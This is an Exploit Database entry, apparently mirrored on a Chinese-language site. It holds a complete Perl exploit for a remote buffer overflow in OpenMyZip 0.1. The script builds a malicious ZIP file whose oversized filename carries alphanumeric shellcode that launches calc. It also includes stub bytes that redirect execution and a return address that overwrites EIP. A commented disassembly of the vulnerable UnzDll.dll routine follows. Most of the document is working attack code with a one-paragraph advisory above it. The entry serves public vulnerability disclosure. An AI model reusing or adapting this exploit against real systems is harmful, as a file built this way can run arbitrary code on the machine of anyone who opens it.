OpenMyZip 0.1 – ‘.zip’ Remote Buffer Overflow

• Exploit Database
• 19 阅读

• 作者： C4SS!0 G0M3S
  日期： 2011-05-02
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/35686/

• source: https://www.securityfocus.com/bid/47678/info
  
  
  OpenMyZip is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
  
  Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
  
  OpenMyZip 0.1 is vulnerable; other versions may also be affected. 
  
  #!/usr/bin/perl
  #
  #
  #[+]Exploit Title: OpenMyZip V0.1 .ZIP File Buffer Overflow Vulnerability
  #[+]Date: 02\05\2011
  #[+]Author: C4SS!0 G0M3S
  #[+]Software Link: http://download.cnet.com/OpenMyZip/3000-2250_4-10657274.html
  #[+]Version: v0.1
  #[+]Tested On: WIN-XP SP3 Brazil Portuguese
  #[+]CVE: N/A
  #
  #
  #
  
  use strict;
  use warnings;
  
  my $filename = "Exploit.zip"; 
  
  
  print "\n\n\t\tOpenMyZip V0.1 .ZIP File Buffer Overflow Vulnerability\n";
  print "\t\tCreated by C4SS!0 G0M3S\n";
  print "\t\tE-mail Louredo_\@hotmail.com\n";
  print "\t\tSite www.exploit-br.org/\n\n";
  
  print "\n\n[+] Creting ZIP File...\n";
  sleep(1);
  my $head = "\x50\x4B\x03\x04\x14\x00\x00".
  "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
  "\x00\x00\x00\x00\x00\x00\x00\x00" .
  "\xe4\x0f" .
  "\x00\x00\x00";
  
  my $head2 = "\x50\x4B\x01\x02\x14\x00\x14".
  "\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
  "\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  "\xe4\x0f".
  "\x00\x00\x00\x00\x00\x00\x01\x00".
  "\x24\x00\x00\x00\x00\x00\x00\x00";
  
  my $head3 = "\x50\x4B\x05\x06\x00\x00\x00".
  "\x00\x01\x00\x01\x00".
  "\x12\x10\x00\x00".
  "\x02\x10\x00\x00".
  "\x00\x00";
  
  my $payload = "\x41" x 8;
  $payload = $payload.
  ("\x61" x 7).#6 POPAD
  ("\x6A\x30").#PUSH 30
  ("\x5B\x52\x59").#POP EBX / PUSH EDX / POP ECX
  ("\x41" x 10).#10 INC EAX
  ("\x02\xd3").#ADD CL,BL
  ("\x51\x58").#PUSH ECX / POP EAX
  ("\x98\xd1"); #BASE CONVERSION 
  #"\x98" == "\xff" 
  				# "\xd1" == "\xd0" 	
  			#"\xff" + "\xd0" = CALL EAX AND CODE EXECUTION.;-}
  $payload .= "\x41" x 22;#MORE PADDING FOR START FROM MY SHELLCODE
  $payload .= 
  "PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIYK9PFQO9OO3LUFRPHLN9R".
  "TFDZTNQ5NV8VQSHR8MSM8KLUSRXRHKDMUVPBXOLSUXI48X6FCJUZSODNNCMTBOZ7JP2ULOOU2JMUMPTN".
  "5RFFIWQM7MFSPZURQYZ5V05ZU4TO7SLKK5KEUBKJPQ79MW8KM12FXUK92KX9SZWWK2ZHOPL0O13XSQCO".#Alpha SHELLCODE WinExec('calc',0) BaseAddress = EAX
  "T67JW9HWKLCLNK3EOPWQCE4PQ9103HMZUHFJUYQ3NMHKENJL1S5NHWVJ97MGK9PXYKN0Q51864NVOMUR".
  "9K7OGT86OPYJ03K9GEU3OKXSKYZA";
  $payload .= "\x44" x (2050-length($payload));
  $payload .= "\x58\x78\x39".#POP EAX / JS SHORT 011E0098
  "\x41" x 5;# PADDING FOR OVERWRITE EIP
  $payload .= pack('V',0x00404042);#JMP EBX
  $payload .= "\x42" x 50;
  $payload .= "\x41" x (4064-length($payload));
  
  $payload = $payload.".txt";
  my $zip = $head.$payload.$head2.$payload.$head3;
  open(FILE,">$filename") || die "[-]Error:\n$!\n";
  print FILE $zip;
  close(FILE);
  print "[+] ZIP File Created With Sucess:)\n";
  sleep(2);
  =head
  #
  #The Vulnerable Function:
  #
  #
  #The Vulnerable function is in MODULE UnzDll.dll on
  #Function UnzDllExec+0x7a3 after CALL the function kernel32.lstrcpyA
  #ocorrs the Buffer Overflow on movimentation of the String Very large.
  #
  #Assemble:
  #
  #0x00DA6A6F53 PUSH EBX
  #0x00DA6A7056 PUSH ESI
  #0x00DA6A718B75 08MOV ESI,DWORD PTR SS:[EBP+8]
  #0x00DA6A748B55 18MOV EDX,DWORD PTR SS:[EBP+18]
  #0x00DA6A778B45 10MOV EAX,DWORD PTR SS:[EBP+10]
  #0x00DA6A7A83BE 8CD20000 00 CMP DWORD PTR DS:[ESI+D28C],0
  #0x00DA6A818D9E 50D80000LEA EBX,DWORD PTR DS:[ESI+D850]
  #0x00DA6A8774 65JE SHORT UnzDll.00DA6AEE
  #0x00DA6A898B8E 84D20000MOV ECX,DWORD PTR DS:[ESI+D284]
  #0x00DA6A8F890B MOV DWORD PTR DS:[EBX],ECX
  #0x00DA6A918B8E 88D20000MOV ECX,DWORD PTR DS:[ESI+D288]
  #0x00DA6A97894B 04MOV DWORD PTR DS:[EBX+4],ECX
  #0x00DA6A9A33C9 XOR ECX,ECX
  #0x00DA6A9CC743 08 A0000000 MOV DWORD PTR DS:[EBX+8],0A0
  #0x00DA6AA3894B 0CMOV DWORD PTR DS:[EBX+C],ECX
  #0x00DA6AA68B4D 0CMOV ECX,DWORD PTR SS:[EBP+C]
  #0x00DA6AA9894B 10MOV DWORD PTR DS:[EBX+10],ECX
  #0x00DA6AAC81BE 88DB0000 91>CMP DWORD PTR DS:[ESI+DB88],91
  #0x00DA6AB67F 0AJG SHORT UnzDll.00DA6AC2
  #0x00DA6AB88BC8 MOV ECX,EAX
  #0x00DA6ABA80E1 FFAND CL,0FF
  #0x00DA6ABD0FBEC9 MOVSX ECX,CL
  #0x00DA6AC0EB 02JMP SHORT UnzDll.00DA6AC4
  #0x00DA6AC28BC8 MOV ECX,EAX
  #0x00DA6AC4894B 14MOV DWORD PTR DS:[EBX+14],ECX
  #0x00DA6AC785D2 TEST EDX,EDX
  #0x00DA6AC98B45 14MOV EAX,DWORD PTR SS:[EBP+14]
  #0x00DA6ACC8943 18MOV DWORD PTR DS:[EBX+18],EAX
  #0x00DA6ACF75 06JNZ SHORT UnzDll.00DA6AD7
  #0x00DA6AD1C643 1C 00 MOV BYTE PTR DS:[EBX+1C],0
  #0x00DA6AD5EB 0AJMP SHORT UnzDll.00DA6AE1
  #0x00DA6AD752 PUSH EDX
  #0x00DA6AD88D53 1CLEA EDX,DWORD PTR DS:[EBX+1C]
  #0x00DA6ADB52 PUSH EDX
  #0x00DA6ADCE8 ABF20000CALL UnzDll.00DB5D8C ; JMP to kernel32.lstrcpyA
  #0x00DA6AE153 PUSH EBX
  #0x00DA6AE2FF96 8CD20000CALL DWORD PTR DS:[ESI+D28C] ; Here ocorrs the Code Execution:-)
  #0x00DA6AE80986 70D20000OR DWORD PTR DS:[ESI+D270],EAX
  #0x00DA6AEE5E POP ESI
  #0x00DA6AEF5B POP EBX
  #0x00DA6AF05D POP EBP
  #0x00DA6AF1C3 RETN
  #
  #
  #
  #
  #
  =cut